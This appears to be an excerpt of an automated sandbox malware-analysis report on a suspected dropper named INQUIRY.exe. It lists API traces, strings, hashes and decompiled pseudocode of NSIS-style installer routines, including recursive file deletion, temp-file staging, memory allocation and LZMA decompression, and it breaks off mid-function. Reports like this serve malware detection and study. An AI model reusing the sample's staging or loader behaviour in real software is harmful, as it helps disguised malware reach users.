0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033ac
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403447
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x00403499
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034d0
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(heifsmlbdxlebvytfzg Setup,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\Desktop\INQUIRY.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNELBASE(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\INQUIRY.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,?,00424000,?), ref: 004034AB
CopyFileA.KERNEL32 ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,?,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

1033, xrefs: 00403393
C:\Users\user\Desktop, xrefs: 00403447, 0040344C, 0040346F
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
/D=, xrefs: 00403327
heifsmlbdxlebvytfzg Setup, xrefs: 00403289
NSIS Error, xrefs: 00403284
SeShutdownPrivilege, xrefs: 00403553
C:\Users\user\Desktop\INQUIRY.exe, xrefs: 004034BA
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
\Temp, xrefs: 0040337F
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 00403299, 0040329F, 004033B5
", xrefs: 004032F3
NCRC, xrefs: 00403311
_?=, xrefs: 004033BF
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
Error launching installer, xrefs: 004033CE
~nsu.tmp, xrefs: 0040343C

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\Desktop\INQUIRY.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\INQUIRY.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$heifsmlbdxlebvytfzg Setup$~nsu.tmp
API String ID: 2278157092-4027426282
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004053b5
0x004053b9
0x004053c2
0x004053c5
0x004053c8
0x004053d0
0x004053d2
0x004053d3
0x00000000
0x004053d3
0x004053e2
0x004053e2
0x004053e5
0x004053e8
0x004053fc
0x00405403
0x00405408
0x0040540a
0x0040541a
0x0040540c
0x00405412
0x00405412
0x0040541f
0x00405422
0x0040542d
0x00405433
0x00405438
0x00405448
0x0040544a
0x00405450
0x00405453
0x00405456
0x00405513
0x00405513
0x00405517
0x00405519
0x00405519
0x00405519
0x00405519
0x00000000
0x00000000
0x00000000
0x00000000
0x0040545c
0x0040545c
0x00405465
0x0040546b
0x00405470
0x00405473
0x00405475
0x00405479
0x0040547b
0x0040547b
0x00405479
0x0040547e
0x00405481
0x00405494
0x00405496
0x0040549b
0x004054a2
0x004054ba
0x004054c0
0x004054c6
0x004054c8
0x004054ed
0x004054ca
0x004054ca
0x004054ce
0x004054e2
0x004054d0
0x004054d3
0x004054d8
0x004054da
0x004054db
0x004054db
0x004054ce
0x004054a4
0x004054aa
0x004054ac
0x004054b2
0x004054b2
0x004054ac
0x00000000
0x004054a2
0x00405483
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00000000
0x00000000
0x0040548e
0x00405492
0x00000000
0x00000000
0x00000000
0x004054f2
0x004054fc
0x00405502
0x00405502
0x0040550d
0x00000000
0x0040550d
0x00405424
0x0040542b
0x00000000
0x00000000
0x00000000
0x004053ea
0x004053ea
0x004053ec
0x0040551d
0x00405520
0x00405523
0x00405575
0x00405575
0x00405575
0x00405525
0x00405528
0x00405533
0x00405538
0x0040553a
0x00000000
0x00000000
0x0040553d
0x00405543
0x00405549
0x0040554f
0x00405551
0x00000000
0x0040556d
0x00405553
0x00405557
0x00000000
0x00000000
0x0040555c
0x00405561
0x00405562
0x00000000
0x00405563
0x0040552a
0x0040552a
0x00000000
0x0040552a
0x004053f2
0x004053f6
0x00000000
0x00000000
0x00000000
0x004053f6

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\INQUIRY.exe" ,73BCF560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

"C:\Users\user\Desktop\INQUIRY.exe" , xrefs: 004053B4
\*.*, xrefs: 0040540C
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA

Memory Dump Source

Source File: 00000001.00000002.664521633.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.664492604.0000000000400000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664553767.0000000000407000.00000002.00020000.sdmpDownload File
Associated: 00000001.00000002.664560673.0000000000409000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664622300.0000000000422000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664638912.0000000000429000.00000004.00020000.sdmpDownload File
Associated: 00000001.00000002.664643458.000000000042C000.00000002.00020000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_INQUIRY.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\INQUIRY.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-2769415763
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 021A0402 Relevance: 10.7, APIs: 7, Instructions: 196
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 021A04DC
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 021A0506
ReadFile.KERNELBASE(00000000,00000000,021A0248,?,00000000), ref: 021A051D
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 021A053F
FindCloseChangeNotification.KERNELBASE(7FDFFF66,?,?,?,?,?,?,?,?,?,?,?,?,?,021A019C,7FDFFF66), ref: 021A05B2
VirtualFree.KERNELBASE(00000000,00000000,00008000,?), ref: 021A05BD
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,021A019C), ref: 021A0608

Memory Dump Source

Source File: 00000001.00000002.665372685.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_21a0000_INQUIRY.jbxd

Similarity

API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
String ID:
API String ID: 656311269-0
Opcode ID: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction ID: 77df89484b09aee6914909c49a19b85abb73b4a1b4b40e29661f2f050dca75f5
Opcode Fuzzy Hash: 7596a5b0863dce102ac5e44fc0c1bf5ec247777bab1f74baaf6af156cc8ed73a
Instruction Fuzzy Hash: D361B138E80614ABCB10DFB4C8A4BAEB7B6AF4C750F148019E515EB390EB349E01CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
